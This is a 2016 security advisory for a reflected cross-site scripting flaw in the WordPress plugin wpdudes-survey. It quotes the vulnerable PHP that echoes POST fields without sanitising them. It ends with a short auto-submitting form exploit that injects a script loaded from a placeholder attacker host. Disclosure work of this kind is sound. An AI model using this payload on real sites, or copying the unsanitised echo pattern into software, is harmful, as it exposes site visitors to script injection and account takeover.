Advisory #: 1178
Title: Reflected XSS in wordpress plugin wpdudes-survey v1.0.4
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/wpdudes-survey
Downloads: 582
Vendor Notified: 2016-02-09
Export: Json
Vendor Contact: plugins@wordpress.org
Plugin Name: wpdudes-survey
Vulnerability:
There is a reflected XSS vulnerability in the following php code ./wpdudes-survey/wpdudes_survey.php: 264: <input type="text" placeholder="Title" value="<?php echo $_POST['wpdudes_survey_title']; ?>" name="wpdudes_survey_title"/><br> 265: <input type="text" placeholder="Set the percentage of surveys submitted before publishing results. Enter between 1 and 100 only. Default is 50." name="wpdudes_survey_percentage_result" value="<?php echo $_POST['wpdudes_survey_percentage_result']; ?>"/><br> 266: <textarea placeholder="Provide a description or a short write-up for the purpose of this survey. People who receive this survey should get an idea of what this survey is for by reading this information." name="wpdudes_survey_desc"><?php echo $_POST['wpdudes_survey_desc']; ?></textarea><br> 267: <textarea placeholder="Add the names of the people for which this rating is being provided (Enter one name per line) " name="wpdudes_survey_names"><?php echo $_POST['wpdudes_survey_names']; ?></textarea><br> 269: <input placeholder='RATING TYPE. Enter a description for the type of rating. Example: Excellent performer or Poor Communications Skills etc.' type='text' name='desc_1' value="<?php echo $_POST['desc_1']; ?>"> 270: <input placeholder='RATING TYPE. Enter a description for the type of rating. Example: Excellent performer or Poor Communications Skills etc.' type='text' name='desc_2' value="<?php echo $_POST['desc_2']; ?>"> 273: <textarea placeholder="Add the list of email addresses of the people who need to submit this survey (Enter one email address per line) " name="wpdudes_survey_emails"><?php echo $_POST['wpdudes_survey_emails']; ?></textarea><br> The variable wpdudes_survey_title appears to send unsanitized data back to the users browser via POST request.
CVE-ID: Not Released
File:./wpdudes-survey/wpdudes_survey.php
Exploit Code:
Exploit was derived from appearance of first vulnerable parameter in code, there could be more shown above.
  1. This is an untested autogenerated exploit:
  2. XSS POST exploit modified from http://blog.portswigger.net/2007/03/exploiting-xss-in-post-requests.html
  3. <form name=TheForm action=http://[target]/wp-content/plugins/wpdudes-survey/wpdudes_survey.php method=post> <input type=hidden name=wpdudes_survey_title value=&quot;&gt;&lt;script&#32;src=http://attacker/bad.js&gt;&lt;/script&gt;> </form> <script> document.TheForm.submit(); </script>